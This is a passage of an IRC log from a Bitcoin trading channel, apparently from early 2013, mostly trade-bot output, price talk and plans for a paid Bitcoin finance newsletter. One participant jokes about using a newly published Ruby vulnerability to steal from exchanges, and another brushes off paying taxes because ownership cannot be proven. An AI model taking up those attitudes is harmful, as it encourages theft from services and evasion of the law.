currently trust it with a case involving my or mpex's interests Jan 31 17:58:58 if you want to go on a limb with it, by all means. Jan 31 18:02:20 [MPEX] [S.MPOE] 5400 @ 0.00066486 = 3.5902 BTC [-] Jan 31 18:02:22 [MPEX] [S.MPOE] 4473 @ 0.00066912 = 2.993 BTC [+] Jan 31 18:02:23 [MPEX] [S.MPOE] 77 @ 0.00066951 = 0.0516 BTC [+] Jan 31 18:06:11 so if it's at or near 30 tomorror, probaby time to buy some puts or somehting Jan 31 18:07:55 it does look bubbly. Jan 31 18:10:04 Well, Thursday was the day last week for a spike followed by "This is moving too fast" sobriety Jan 31 18:10:24 ;;ticker Jan 31 18:10:25 BTCUSD ticker | Best bid: 20.80001, Best ask: 20.88000, Bid-ask spread: 0.07999, Last trade: 20.90996, 24 hour volume: 72209.06640419, 24 hour low: 19.40450, 24 hour high: 21.30000, 24 hour vwap: 20.22626 Jan 31 18:10:51 i read in fortune in 2011: we dont know of it is a bubble until it pops Jan 31 18:12:09 so is this really a bubble? Jan 31 18:13:09 http://i.imgur.com/mXGnpvK.png Jan 31 18:13:12 this image is so humorous Jan 31 18:13:43 thestringpuller by the time you're buying it it will be Jan 31 18:22:33 thestringpuller: generally, you cut losses and let profits ride, that's why, when you suspect a bubble, you don't sell all. you hedge your position Jan 31 18:23:25 essentially, weaken future potential profits in order to preserver the current ones Jan 31 18:24:55 mircea_popescu: do you see any new companies coming into the mpex fold? also i assume you just avoid including all the miner pools, correct? Jan 31 18:25:14 miner pools aren't exactly companies. Jan 31 18:25:14 by coming into the fold i mean, ipos Jan 31 18:25:19 yeah Jan 31 18:25:28 well, in principle yes. Jan 31 18:25:46 in practice, good companies with revenue and market don't much want to list because why share your profits Jan 31 18:26:05 and also why put up with idiots a la PsychoticBoy eskimoblob etc filling up the forum with nonsense Jan 31 18:26:09 to support bitcoin, aggressive expansion (advertising) Jan 31 18:26:12 so why did S.DICE list? Jan 31 18:26:22 pizzaman1337: to cover their risks, and expansion Jan 31 18:26:45 pizzaman1337 well, for multiplereasons. there's a lot of benefit to being listed as a dice site Jan 31 18:26:50 lol, that image.. the "why did I get this?" link Jan 31 18:26:55 because you can very convincingly argue you can afford to pay wins Jan 31 18:27:00 so whales dare play. Jan 31 18:27:28 it links to http://www.youtube.com/watch?v=WeYsTmIzjkw Jan 31 18:27:38 and also why put up with idiots a la PsychoticBoy eskimoblob etc filling up the forum with nonsense<< LOL Jan 31 18:27:44 mircea_popescu: is any part of the process and application for ipos public, posted as news, by you or them? or is it pretty much until it happens. i mean, even knowing when a new company will release ipos there might be a nice way to get an alert Jan 31 18:27:52 Go back to your trailer Jan 31 18:28:12 gesell http://trilema.com/2012/how-does-one-list-on-mpex/ Jan 31 18:28:31 PsychoticBoy!*@* added to ignore list. Jan 31 18:28:55 [MPEX] [S.MPOE] 11350 @ 0.00066951 = 7.5989 BTC [+] Jan 31 18:29:21 I don't think bitcoin needs 'aggressive expansion'. Jan 31 18:29:27 mircea_popescu: yeah that is the means for exploring signing up with you. im just curious if investors can get a headsup when this starts, or at least when its going to happen. rather than just refreshing the mpex website all the time Jan 31 18:29:41 it has momentum. Jan 31 18:29:57 gesell in general ipos are announced in advance. were you around during the bbet ipo ? Jan 31 18:30:42 no, i wasnt. left the scene for a while until dec last year Jan 31 18:30:50 [MPEX] [S.MPOE] 12423 @ 0.00066951 = 8.3173 BTC [+] Jan 31 18:30:56 [MPEX] [S.MPOE] 2177 @ 0.00067067 = 1.46 BTC [+] Jan 31 18:31:11 where do you anounce, on blog (with a certain category i can monitor) or here, or twitter, or? Jan 31 18:31:14 ok, so, site was opened for beta, it was announced it will ipo in 5 days, Jan 31 18:31:24 the details were available (contract was published) Jan 31 18:31:31 and then on ipo day people just got their asks filled Jan 31 18:31:50 [MPEX] [S.MPOE] 4956 @ 0.00066707 = 3.306 BTC [-] Jan 31 18:31:55 [MPEX] [S.MPOE] 11050 @ 0.00066656 = 7.3655 BTC [-] Jan 31 18:32:00 [MPEX] [S.MPOE] 3494 @ 0.00066647 = 2.3286 BTC [-] Jan 31 18:32:02 where was it announced, blog and mpex site, that all? Jan 31 18:32:06 in general i'll say something here and mpoe-pr will make an announcement on forum Jan 31 18:32:10 sorry to get specific but id just like to monitor the progress Jan 31 18:32:14 ok Jan 31 18:32:16 course people are allowed to announce their ipo wherever they want Jan 31 18:32:25 nothing wrong with being specific Jan 31 18:32:41 aslo, it shows up on mpex.co, but you're unable to trade it Jan 31 18:32:49 im just assuming there will be a day im not so active with bct and might only monitor once a month Jan 31 18:32:55 'cause there're no sells yet Jan 31 18:32:57 but there are certain things id like to know right away Jan 31 18:33:03 such as new companies going public'ish Jan 31 18:33:12 well, if anyone actually starts a real analyst service for btc finance Jan 31 18:33:20 i suppose they might maintain an emergency mail list Jan 31 18:33:48 yeah Jan 31 18:33:56 it really boggles me that this isn't moving, the need for btc finance news is marked and yet... crckets Jan 31 18:34:00 people make gemsites. Jan 31 18:34:42 someone should just grab googles and others from the forum and cuddle them for a while, until eventually having such a service Jan 31 18:34:52 goodles, whatever his name is Jan 31 18:35:07 dooglus ? Jan 31 18:35:15 the couple pay for btc financial analysis services seem like crap, that are out there at the moment Jan 31 18:35:20 dooglus, yeah Jan 31 18:35:34 yeah, he could do a fine job. Jan 31 18:35:40 so tell him lol Jan 31 18:35:52 problem is the forum isn't good new with so much trolling, and google pickups are too sparse. but in time news should pick up enough. Jan 31 18:36:06 DeadWeasel i imagine something like a blog would be great. Jan 31 18:36:12 yeah, you don Jan 31 18:36:19 't need to provide the service Jan 31 18:36:28 S.dooglus Jan 31 18:36:35 just build the organization which pays the the people who do Jan 31 18:37:11 i think tbh, most people on mpex are btc addicts, reading it all multiple times a day Jan 31 18:37:13 how hard is it to receive btc payments and pay employees/contractors/freelancers? Jan 31 18:37:13 that would fit the definition of blog. trolling and updated every 3 days or less Jan 31 18:37:39 smickles: a spreadsheet? Jan 31 18:37:57 [MPEX] [S.MPOE] 11150 @ 0.00066647 = 7.4311 BTC [-] Jan 31 18:38:28 gesell: how much would you pay for a subscription to 'btc finance' Jan 31 18:38:32 mircea_popescu: yeah feels like a lot of day traders around (or that type of fervant observation) Jan 31 18:38:59 gesell i suppose the alternative would be to just invest in a fund, and let the manager worry about daily news Jan 31 18:39:14 of course, due to the idiocy that was glbse, it will be a little while yet before people trust such funds Jan 31 18:39:44 1 btc / month? Jan 31 18:39:48 smickles: i'd expect it to cover options, dirivitives, cover some hot topics ("why 21 without huge influx of new users?", with data) and have code to pwn blockchain analysis. I'd pay a BTC a month at the moment Jan 31 18:39:57 and im sure those with more money in the market would pay a lot more Jan 31 18:40:23 also, consider that your "experts" will get requests from big players. you will note on the sdice analysis thread mr sdice asked two people for help in analysis privately Jan 31 18:40:30 so you'll have consultancy on the side Jan 31 18:40:31 [MPEX] [S.DICE] 4450 @ 0.00651702 = 29.0007 BTC [-] Jan 31 18:40:32 [MPEX] [S.DICE] 1550 @ 0.00651712 = 10.1015 BTC [+] Jan 31 18:40:54 ok, who would be willing to write these articles for .3 btc per article? Jan 31 18:41:56 i think you just find the people doing it and pay them a little to do it as a collective. you guide them in how to give enough information publicly but have more privately. for example dougles could put half the detail he does on his analysis of sdice and still provide huge value publicly and the rest privately Jan 31 18:42:31 i doubt you could get him to go for a scheme like that Jan 31 18:42:31 for example, was thinking about this today Jan 31 18:42:36 struck me as a very open-source type. Jan 31 18:43:25 the analysis sdice is nice but i'd like to see someone reverse engineer the blockchain to try to determine the PRNG sdice is depending on, then explore potential weaknesses or just confirm there are none. Maybe show where in the history the PRNG changed. but thats more hacker type of analysis Jan 31 18:43:29 to me they all mix though Jan 31 18:43:31 yeah, thing about dooglas, anyone could do that. so if you put up a pay wall, someone else will run the script publically Jan 31 18:43:50 i have no idea what prng is Jan 31 18:44:04 psuedo-number-random-generator Jan 31 18:44:25 i dont know the internals yet but i assume the calculations on winning nubmers depend on some randomness Jan 31 18:44:27 well, i have a hunch I could produce 1 article per day, if only I had the writers Jan 31 18:44:57 #WINNING Jan 31 18:45:04 o hey Bugpowder : Jan 31 18:45:05 "Pastebin dump of a letter from SEC sent to several people who ran "funds" on GLBSE. Forum statements about people calling the attorney on the letter and providing statements. Not clear if it was just elaborate trolling..." Jan 31 18:45:08 im also assuming a PRNG is involved (/dev/random, etc) Jan 31 18:45:09 you got that pastebin ?! Jan 31 18:45:24 or did you mean the pirate thing Jan 31 18:45:32 it was the pirate thing Jan 31 18:45:34 gesell it's not. Jan 31 18:45:47 the randomness for s.dice is provided by the blockchain itself. Jan 31 18:46:18 yeah and extrapolate back to where bitcoin depends on a PRNG Jan 31 18:46:27 S.DICE back over 20,000 for the month Jan 31 18:46:30 heheh Jan 31 18:46:47 [MPEX] [S.DICE] 49 @ 0.0069328 = 0.3397 BTC [+] Jan 31 18:46:55 smickles there were rumours of some actual glbse investigation, i was never able to obtain anything whatsoever Jan 31 18:47:07 ;;asks 20.46 Jan 31 18:47:09 There are currently 0 bitcoins offered at or under 20.46 USD, worth 0.0 USD in total. Jan 31 18:47:11 I saw a paste bin thing Jan 31 18:47:14 that's it Jan 31 18:47:17 long time ago. Jan 31 18:47:18 ;;asks 21.46 Jan 31 18:47:20 There are currently 530.07335 bitcoins offered at or under 21.46 USD, worth 11327.2941393 USD in total. Jan 31 18:47:24 [MPEX] [S.DICE] 1 @ 0.00724211 BTC [+] Jan 31 18:47:26 Bugpowder: would you write articles about the btc finance world for a starting wage of .3 btc per article? Jan 31 18:47:39 me? Jan 31 18:47:40 no Jan 31 18:47:46 dam Jan 31 18:47:53 lmao smickles Jan 31 18:48:06 you'd get raises proportional to the # of subscribers :D Jan 31 18:48:10 bugpowder, i can throw in another 0.3 Jan 31 18:48:27 jurov: you can be a subscriber, i'm the boss here Jan 31 18:48:28 :P Jan 31 18:48:39 mircea_popescu: yeah i guess i should understand how sdice works Jan 31 18:48:46 everyone wants to be an entrepreneur, nobody wants to do any work anymore Jan 31 18:49:23 btw jurov, would you write articles for .3 btc each starting out ? Jan 31 18:49:26 :) Jan 31 18:49:50 maaybe somethign short. when i'm in mood Jan 31 18:50:35 I will tweet for 0.3BTC / tweet Jan 31 18:50:38 it doesn't have to be long, just newsworthy or quality information Jan 31 18:50:54 I'll retweet Bugpowder for 0.03btc Jan 31 18:51:03 Bugpowder how many followers ? Jan 31 18:51:07 i pastebinned the letter i got from the sec, i verified it was from the sec, i know lots of people who talked with the sec and they wanted to know, "how did you get your glbse account?" "who promotes glbse?" etc Jan 31 18:51:14 ok, what about 2.1 BTC per article? Jan 31 18:51:19 [BTCTC] [BTC-BOND] 499 @ 0.01 = 4.99 BTC [+] Jan 31 18:51:50 2.1BTC is much fairer game Jan 31 18:52:09 21.4 Jan 31 18:52:16 honestly, i think the only way that idea will work is owner-operated Jan 31 18:52:24 as a sort of what's his name, the techcrunch guy. Jan 31 18:52:44 yeah you want to make money on the back end too Jan 31 18:53:11 alright, important question... where are some ruby based exchanges... gonna go get me some bitcoin https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0333 Jan 31 18:53:24 (released TODAY) Jan 31 18:53:24 gesell you're late. Jan 31 18:53:28 oh??? Jan 31 18:53:29 :( Jan 31 18:53:30 what AGAIN ?! Jan 31 18:53:39 don't tell me ruby is blown wide open twice in three weeks Jan 31 18:54:05 yeah this is in yaml JSON processing, and we know btc looooves them some JSON Jan 31 18:54:06 and those are the KNOWN vulnerabilities Jan 31 18:54:08 anyway, vircurex/cryptostocks got owned, bitfinex escaped through global disinterest. Jan 31 18:54:13 gesell, what about php :D Jan 31 18:54:23 there's plenty more on ruby. glbse escaped through being already dead. Jan 31 18:54:34 [BTCTC] [GSDPT] 100 @ 0.0075 = 0.75 BTC [+] Jan 31 18:55:06 actually, from people that k n o w, this new bug was based on the old one (https://community.rapid7.com/community/metasploit/blog/2013/01/09/serialization-mischief-in-ruby-land-cve-2013-0156) but HD Moore just missed it Jan 31 18:55:51 a ok Jan 31 18:57:29 [BTCTC] [B.YABMC] 25 @ 0.0265 = 0.6625 BTC [+] Jan 31 18:57:29 bitcoin-central.net also Jan 31 18:57:29 well, 10 subscribers per writer at 1btc per subscription means 1 article per week per writer. writers paid 2.1 btc per article, and a decent rake for the operator Jan 31 18:57:29 whats gox on, btw? Jan 31 18:57:29 (ruby, pyton, whitespace)? Jan 31 18:57:29 it's in befunge Jan 31 18:57:29 nobody gonna pay that. Jan 31 18:57:30 owner operated with ad rev is your best bet Jan 31 18:57:30 these "technical anal" dudes get paid quite nicely i heard Jan 31 18:57:52 whats technical anal? and ill try to avoid all the puns that come to mind Jan 31 18:58:04 DeadWeasel: i think you're wrong, a few people have already said that they'd pay 1 btc per month Jan 31 18:58:12 yup, networkd throughput over 30 Jan 31 18:58:16 this is a new record. Jan 31 18:58:26 gesell http://blog.bitcoinwatch.com/ for example Jan 31 18:58:29 gesell: technical analysis applied to bitcoin Jan 31 18:58:40 many of them have closed paid newsletter Jan 31 18:58:44 i really find that site stupid Jan 31 18:59:01 it states the obvious and draws sime lines Jan 31 18:59:27 i would say someone somewhere is hashing on asics Jan 31 18:59:41 ;;bc,stats Jan 31 18:59:45 Current Blocks: 211512 | Current Difficulty: 3438908.9601591 | Next Difficulty At Block: 211679 | Next Difficulty In: 167 blocks | Next Difficulty In About: 1 day, 2 hours, 15 minutes, and 22 seconds | Next Difficulty Estimate: 3385331.85509049 | Estimated Percent Change: -1.557968114 Jan 31 18:59:59 and ddif goes down. yea. Jan 31 19:00:38 strange Jan 31 19:00:47 bitcoincharts reports Difficulty 2968775 Estimated 3111301 in 800 blks Jan 31 19:01:15 the bot is way behind on the block count too Jan 31 19:01:24 we're at 218944 currently. Jan 31 19:02:11 ok Jan 31 19:02:16 I'm launching it Jan 31 19:02:59 1btc per month, news and research on all the 'bitcoin assets' Jan 31 19:03:10 i can write funny summary of happenings between ukto and burnside :D Jan 31 19:03:30 jurov ^ Jan 31 19:03:36 also the two guys with the gem and gold bar Jan 31 19:03:46 including the aftermath, they tend to come to me separately for a cookie and soothing word Jan 31 19:03:51 ajahaha! Jan 31 19:05:21 I think i can get dooglus to present information tailored to shareholders, rather than just the curious Jan 31 19:05:54 *shareholders and potential investors, that is Jan 31 19:06:48 so mazel tov Jan 31 19:10:55 ;; ticker Jan 31 19:10:56 BTCUSD ticker | Best bid: 21.25025, Best ask: 21.38000, Bid-ask spread: 0.12975, Last trade: 21.25000, 24 hour volume: 80777.74688070, 24 hour low: 19.42552, 24 hour high: 21.43000, 24 hour vwap: 20.34921 Jan 31 19:12:04 does anyone know if exchanges operate their own bots. ive noticed bots responding to bids with <500ms delay to my bids on one exchange Jan 31 19:12:52 [MPEX] [S.MPOE] 5106 @ 0.00066647 = 3.403 BTC [-] Jan 31 19:12:54 [MPEX] [S.MPOE] 4321 @ 0.00066384 = 2.8685 BTC [-] Jan 31 19:12:55 [MPEX] [S.MPOE] 4297 @ 0.00066383 = 2.8525 BTC [-] Jan 31 19:12:57 [MPEX] [S.MPOE] 7102 @ 0.00066299 = 4.7086 BTC [-] Jan 31 19:13:05 smickles: throw into it your monitoring of this channel and mpex. get share holder info automated where possible, have an article every month... a couple other pretty graphs. and your done Jan 31 19:13:35 gesell which one ? Jan 31 19:13:36 for instance, historical data of mpex might be usefull and not provided anywhere yet Jan 31 19:13:55 mircea_popescu: bitcoin-24 Jan 31 19:15:15 smickles: most of it could be public. for instance mircea's insight on pirate insider trading. but you could have comments to that private to subscribers Jan 31 19:15:23 already with that you provide a nice community Jan 31 19:15:29 eh, another bootstrap Jan 31 19:15:32 didn't even know it existed. Jan 31 19:16:49 19.7 ? srsly ? Jan 31 19:16:51 smickles: mircea_popescu might even help you by giving you a dump of the historical trades ;) Jan 31 19:17:03 bitcoin-24 is very close to mtgox price Jan 31 19:17:11 i'll write a book "MPEx: The Missing Manual" and sell it for 10BTC. dead trees only. Jan 31 19:17:14 they take no cover for trades Jan 31 19:17:43 bitcoin-24 is only based on donations atm Jan 31 19:18:17 scary as sht from the security perspective. but then again, maybe they their money by cherry picking trades via the backend and bots Jan 31 19:23:31 [MPEX] [S.MPOE] 2926 @ 0.00066299 = 1.9399 BTC [-] Jan 31 19:27:13 [MPEX] [S.MPOE] 2772 @ 0.00066299 = 1.8378 BTC [-] Jan 31 19:27:15 [MPEX] [S.MPOE] 5650 @ 0.00066144 = 3.7371 BTC [-] Jan 31 19:27:16 [MPEX] [S.MPOE] 4378 @ 0.00066042 = 2.8913 BTC [-] Jan 31 19:28:28 I'll OCR that shit and sell it for 5BTC, of course I'll only sell one before it's a torrent, and we're both screwed. Jan 31 19:28:58 How about someone writes a guide on how to handle their taxes when they have BTC? Jan 31 19:29:00 I have no clue. Jan 31 19:29:05 any pointers?> Jan 31 19:29:13 then ill take the torrent, cut it up into tweet size segments, and embed it in the blockchain Jan 31 19:30:05 man that message feature for the chain is gonna be a disaster some day Jan 31 19:30:39 then again, maybe its exactly what moorse law needed Jan 31 19:30:50 !ticker m s.mpoe Jan 31 19:30:52 [MPEX:S.MPOE] 1D: 0.00065258 / 0.0006662 / 0.00067692 (1721184 shares, 1,146.66 BTC), 7D: 0.00061382 / 0.00067113 / 0.0007 (22322554 shares, 14,981.48 BTC), 30D: 0.00059445 / 0.00065641 / 0.0007 (49935623 shares, 32,778.42 BTC) Jan 31 19:31:12 ;;calc 666200 * 21.5 Jan 31 19:31:13 14323300 Jan 31 19:31:22 i win internets. Jan 31 19:34:33 [MPEX] [S.MPOE] 20122 @ 0.00066042 = 13.289 BTC [-] Jan 31 19:34:34 [MPEX] [S.MPOE] 283 @ 0.00065946 = 0.1866 BTC [-] Jan 31 19:36:03 you want to be the richest person in romania? Jan 31 19:36:29 audios Jan 31 19:37:25 [MPEX] [S.MPOE] 4100 @ 0.00065946 = 2.7038 BTC [-] Jan 31 19:41:11 sure. Jan 31 19:41:27 jeez negative q4 gdp. they're fucked over there aren't they. Jan 31 19:41:43 Bugpowder how's the indexes Jan 31 19:44:12 where negative? US? Jan 31 19:45:11 ya' Jan 31 19:45:53 can anybody point me to a guide on how to pay taxes on my BTCs? Do I need to? Jan 31 19:46:24 US here Jan 31 19:46:38 dunno Jan 31 19:46:58 DeadWeasel you should prolly ask an accountant. Jan 31 19:47:00 http://i.imgur.com/36xaw6e.jpg Jan 31 19:47:00 otc trade here is untaxed luckaly Jan 31 19:47:22 that should answer your question Jan 31 19:47:34 it does. Jan 31 19:47:41 well, they can't prove I own shit. Jan 31 19:47:46 so fuck'em Jan 31 19:47:58 somebody gifted it to you Jan 31 19:48:33 your computed catched that bitcoin malware Jan 31 19:49:16 you don't pay taxes when you buy whatever it is to play farmville, right? Jan 31 19:49:28 or gold in WoW? Jan 31 19:50:03 that;s about what i figure. Jan 31 19:50:17 http://trilema.com/2012/the-reasons-why-bitcoin-securities-cant-be-regulated-by-the-sec/ Jan 31 19:50:19 it's all in there. Jan 31 19:50:19 how is it any different? Jan 31 19:50:33 thx mp Jan 31 19:50:35 dunno about us tax code, but you have to tax any income but from games it is usally too small Jan 31 19:51:15 if it's under 20k you have it's meh, over that ask some tax advisor Jan 31 19:51:23 and it's not income until you sell it, right? Jan 31 19:52:13 yes Jan 31 19:52:35 that's for sure, some countries may have fictive income Jan 31 19:52:55 [BTCTC] [B.YABMC] 7 @ 0.0217 = 0.1519 BTC [-] Jan 31 19:52:57 [BTCTC] [B.YABMC] 171 @ 0.0216 = 3.6936 BTC [-] Jan 31 19:52:59 [BTCTC] [B.YABMC] 10 @ 0.0215 = 0.215 BTC [-] Jan 31 19:53:00 [BTCTC] [B.YABMC] 1 @ 0.0213 BTC [-] Jan 31 19:53:02 [BTCTC] [B.YABMC] 1 @ 0.021 BTC [-] Jan 31 19:53:03 [BTCTC] [B.YABMC] 150 @ 0.0202 = 3.03 BTC [-] Jan 31 19:53:05 [BTCTC] [B.YABMC] 50 @ 0.0201 = 1.005 BTC [-] Jan 31 19:56:37 s.dice wants 1 confirm now? Jan 31 20:05:18 does it ? Jan 31 20:06:29 can't get an instant 2-figure bet Jan 31 20:06:45 ;;bc,stats Jan 31 20:07:12 JohnGalt1337 possibly cause of your inputs ? Jan 31 20:07:12 Error: invalid syntax (, line 1) Jan 31 20:07:40 ;;bc,stats Jan 31 20:07:59 ;;bc,diffchange Jan 31 20:08:07 Error: invalid syntax (, line 1) Jan 31 20:08:17 Error: invalid syntax (, line 1) Jan 31 20:09:05 decent uptick here http://bitcoin.sipa.be/speed-lin-2k.png Jan 31 20:10:36 yah Jan 31 20:10:52 definitely asics online. Jan 31 20:10:57 33th thoroughput atm Jan 31 20:14:23 [MPEX] [S.MPOE] 4321 @ 0.0006596 = 2.8501 BTC [+] Jan 31 20:14:25 [MPEX] [S.MPOE] 879 @ 0.00065946 = 0.5797 BTC [-] Jan 31 20:22:16 [MPEX] [S.DICE] 1241 @ 0.00668864 = 8.3006 BTC [-] Jan 31 20:22:18 [MPEX] [S.DICE] 59 @ 0.00665746 = 0.3928 BTC [-] Jan 31 20:24:37 [MPEX] [O.BTCUSD.C190T] 5 @ 0.20602845 = 1.0301 BTC [+] Jan 31 20:24:55 [MPEX] [O.BTCUSD.C180T] 5 @ 0.23256963 = 1.1628 BTC [+] Jan 31 20:26:59 [MPEX] [O.BTCUSD.C160T] 5 @ 0.29273405 = 1.4637 BTC [+] Jan 31 20:29:08 [MPEX] [S.MPOE] 11788 @ 0.00065946 = 7.7737 BTC [-] Jan 31 20:29:09 [MPEX] [S.MPOE] 6363 @ 0.00065883 = 4.1921 BTC [-] Jan 31 20:37:01 [BTCTC] [GSDPT] 2 @ 0.0074 = 0.0148 BTC [-] Jan 31 20:38:20 [MPEX] [S.MPOE] 3937 @ 0.00065883 = 2.5938 BTC [-] Jan 31 20:38:22 [MPEX] [S.MPOE] 13450 @ 0.00065725 = 8.84 BTC [-] Jan 31 20:38:23 [MPEX] [S.MPOE] 14184 @ 0.00065669 = 9.3145 BTC [-] Jan 31 20:38:24 [MPEX] [S.MPOE] 2829 @ 0.00065564 = 1.8548 BTC [-] Jan 31 20:41:19 https://bitcointalk.org/index.php?topic=99497.msg1493791#msg1493791 Jan 31 20:41:25 so the hash increase is not asicminer. Jan 31 20:46:24 [MPEX] [S.MPOE] 2394 @ 0.00066117 = 1.5828 BTC [+] Jan 31 20:46:26 [MPEX] [S.MPOE] 5142 @ 0.00066223 = 3.4052 BTC [+] Jan 31 20:46:27 [MPEX] [S.MPOE] 2900 @ 0.00066591 = 1.9311 BTC [+] Jan 31 20:46:28 [MPEX] [S.MPOE] 554 @ 0.00067067 = 0.3716 BTC [+] Jan 31 20:46:29 [MPEX] [S.MPOE] 4321 @ 0.00067103 = 2.8995 BTC [+] Jan 31 20:46:30 [MPEX] [S.MPOE] 4839 @ 0.00067104 = 3.2472 BTC [+] Jan 31 20:46:37 so bfl will be last of them all Jan 31 20:46:45 maybe they are having a drink with tom somewhere Jan 31 20:47:36 lol Jan 31 20:47:47 You know who else was always cocky with the clients? Pirate and that ended well. Jan 31 20:47:51 i must confess, i am pretty blown away. Jan 31 20:48:12 i had just about zero faith in any of them people producing working asic miners. Jan 31 20:48:22 that two out of four would is like... wow. Jan 31 20:49:09 course, it's still not cut and dried, the recent uptick in hashrate may well be people putting old gpus online cause of price increase Jan 31 20:49:21 yes. Jan 31 20:49:31 but if indeed they hash im wow'd. Jan 31 20:49:38 price increase>difficulty increase Jan 31 20:49:44 imsaguy yea. Jan 31 20:49:47 [MPEX] [S.MPOE] 3100 @ 0.00067103 = 2.0802 BTC [-] Jan 31 20:49:57 i imagine with btc over 20 pretty much everyone turned on everything they could. Jan 31 20:50:20 for a little while :) Jan 31 20:51:31 ;;ticker Jan 31 20:51:32 BTCUSD ticker | Best bid: 21.19101, Best ask: 21.24999, Bid-ask spread: 0.05898, Last trade: 21.29900, 24 hour volume: 88825.09670330, 24 hour low: 19.51123, 24 hour high: 21.43000, 24 hour vwap: 20.45318 Jan 31 20:51:55 ;;bc,convert eur Jan 31 20:51:56 1 BTC = 21.29900 U.S. dollars = 15.7188192 Euros Jan 31 20:52:14 just 0.04 from that bitbet bid... as if exactly calculated to keep the suspense Jan 31 20:52:25 lol! Jan 31 20:52:36 (disclosure: I have bet No) Jan 31 20:53:13 DeadWeasel, IANAL but a conservative position would be that any dividends or payments to you in bitcoin is considered income at the current exchange rate and should be reported. Any price gains in bitcoin holdings would be treated as capital gains upon sale of the coins Jan 31 20:53:58 Bugpowder the btc graph is copying your portofolio graph Jan 31 20:54:16 infinitive loop then Jan 31 20:54:19 were fucked Jan 31 20:54:24 ya lol Jan 31 20:54:39 well Jan 31 20:54:45 my graph is accelerating Jan 31 20:54:52 as the calls go ITM Jan 31 20:55:33 speed>9000 Jan 31 20:55:33 Where's the short squeeze when you need it? Jan 31 20:55:51 tghere's no shorts to squeeze Jan 31 20:55:57 27 Jan 31 20:56:03 29.9 is coming Jan 31 20:56:08 I hope Jan 31 20:56:21 the ask pyramid is pretty awesome Jan 31 20:56:46 mircea_popescu, you know as well as I do, that things won't run away forever Jan 31 20:56:56 at some point, there is always a ceiling Jan 31 20:57:16 imsaguy sure. i don't even think it'll hit 30 tbh. Jan 31 20:57:32 well, given your track record with asics, that means nothing. Jan 31 20:57:37 jcpham, I'm pretty long ;) Jan 31 20:57:48 that's what the the ladies say about me too Jan 31 20:57:49 indeed. Jan 31 20:57:51 think also Jan 31 20:58:20 but even so, there's no shorts to squeeze. Jan 31 20:58:30 you can squueze my shorts Jan 31 20:59:17 sounds scary jcpham Jan 31 20:59:36 i'll make a video for you Jan 31 20:59:47 showing my shorts be squoze Jan 31 20:59:57 freshly squoze Jan 31 21:01:09 uhooh Jan 31 21:02:49 http://bitbet.us/bet/206/bitcoin-market-cap-above-1-billion-before-end/ Jan 31 21:02:51 this is a good one Jan 31 21:13:10 teology meets bitcoin: http://dailyanarchist.com/2013/01/30/is-bitcoin-sharia-compliant/ Jan 31 21:13:27 ahahaha o this title promises Jan 31 21:14:12 it probably is. Jan 31 21:14:33 [MPEX] [S.MPOE] 6106 @ 0.00067089 = 4.0965 BTC [-] Jan 31 21:14:52 the article fails to deliver. Jan 31 21:16:02 Bugpowder: that's what I expect. Fortunately I've realized no gains as I've sold nothing. I only hold BTCs, not assets, I'm here trying to figure out if I want to. Jan 31 21:16:43 [MPEX] [S.DICE] 700 @ 0.00689774 = 4.8284 BTC [+] Jan 31 21:16:45 [MPEX] [S.DICE] 1100 @ 0.00693297 = 7.6263 BTC [+] Jan 31 21:16:46 [MPEX] [S.DICE] 300 @ 0.00698411 = 2.0952 BTC [+] Jan 31 21:16:57 [MPEX] [S.MPOE] 15450 @ 0.00067089 = 10.3653 BTC [-] Jan 31 21:18:14 https://en.bitcoin.it/wiki/Tax_compliance Jan 31 21:26:06 ;;asks 25 Jan 31 21:26:08 There are currently 20903.827 bitcoins offered at or under 25.0 USD, worth 479496.181721 USD in total. Jan 31 21:26:35 ;;ticker Jan 31 21:26:36 BTCUSD ticker | Best bid: 21.10002, Best ask: 21.21999, Bid-ask spread: 0.11997, Last trade: 21.21999, 24 hour volume: 89530.44568844, 24 hour low: 19.51123, 24 hour high: 21.43000, 24 hour vwap: 20.47918 Jan 31 21:27:01 :D Jan 31 21:29:30 [MPEX] [S.MPOE] 5577 @ 0.00067089 = 3.7416 BTC [-] Jan 31 21:32:37 [MPEX] [S.MPOE] 16300 @ 0.00067104 = 10.938 BTC [+] Jan 31 21:46:28 It looks like it might run up to $25 though. The word is out on coinz though. My buddies keep blowing up my phone "OMG MOD6 MAKE US POKER SITE NOW!!!111" Jan 31 21:47:27 [BTCTC] [GSDPT] 100 @ 0.0074 = 0.74 BTC [-] Jan 31 21:47:47 I mean these guys are not IT people or anything, just poker guys who are dying to play online again. Jan 31 21:47:50 lol Jan 31 21:49:30 gonna just have to get some seed money maybe to hire d00dz to help me with dev. or clone myself 69 times. Jan 31 21:50:20 anyway, we'll see. Jan 31 21:51:10 [MPEX] [S.MPOE] 6311 @ 0.00067104 = 4.2349 BTC [+] Jan 31 21:51:12 [MPEX] [S.MPOE] 21689 @ 0.00067228 = 14.5811 BTC [+] Jan 31 21:51:25 poker site ?! Jan 31 21:51:38 what's wrong with seals ? Jan 31 21:51:50 ya! i told 'em about seals with clubs Jan 31 21:51:53 micon. Jan 31 21:52:13 haha. i dunno. i liked seals with clubs. Jan 31 21:52:57 i played there a few times when coins were like $3 Jan 31 21:53:09 just checkin it out... you know? Jan 31 21:56:20 mod6> so you are putting together an it team for poker site? Jan 31 21:59:31 [BTCTC] [RSM] 30 @ 0.0091 = 0.273 BTC [-] Jan 31 22:03:33 [MPEX] [S.MPOE] 1551 @ 0.00067089 = 1.0406 BTC [-] Jan 31 22:03:35 [MPEX] [S.MPOE] 3299 @ 0.00066114 = 2.1811 BTC [-] Jan 31 22:04:19 [MPEX] [S.MPOE] 1221 @ 0.00067224 = 0.8208 BTC [+] Jan 31 22:04:21 [MPEX] [S.MPOE] 6824 @ 0.00067228 = 4.5876 BTC [+] Jan 31 22:05:32 [MPEX] [S.DICE] 800 @ 0.0068976 = 5.5181 BTC [-] Jan 31 22:05:34 [MPEX] [S.DICE] 200 @ 0.00724211 = 1.4484 BTC [+] Jan 31 22:05:54 micon is marginally relevant. i mean, he's the site's stuffie. who cares whart he does ? Jan 31 22:06:13 i'm just guessing it's a waste of effort to reimplement something that already exists and works. Jan 31 22:06:56 hm, is bitcointalk down ? Jan 31 22:07:04 oh dear lord Jan 31 22:07:07 usagi is back again Jan 31 22:07:59 [HAVELOCK] [SDICE] 2 @ 0.69 = 1.38 BTC [-] Jan 31 22:08:01 [HAVELOCK] [SDICE] 6 @ 0.685 = 4.11 BTC [-] Jan 31 22:08:28 mircea_popescu: it's very slow today Jan 31 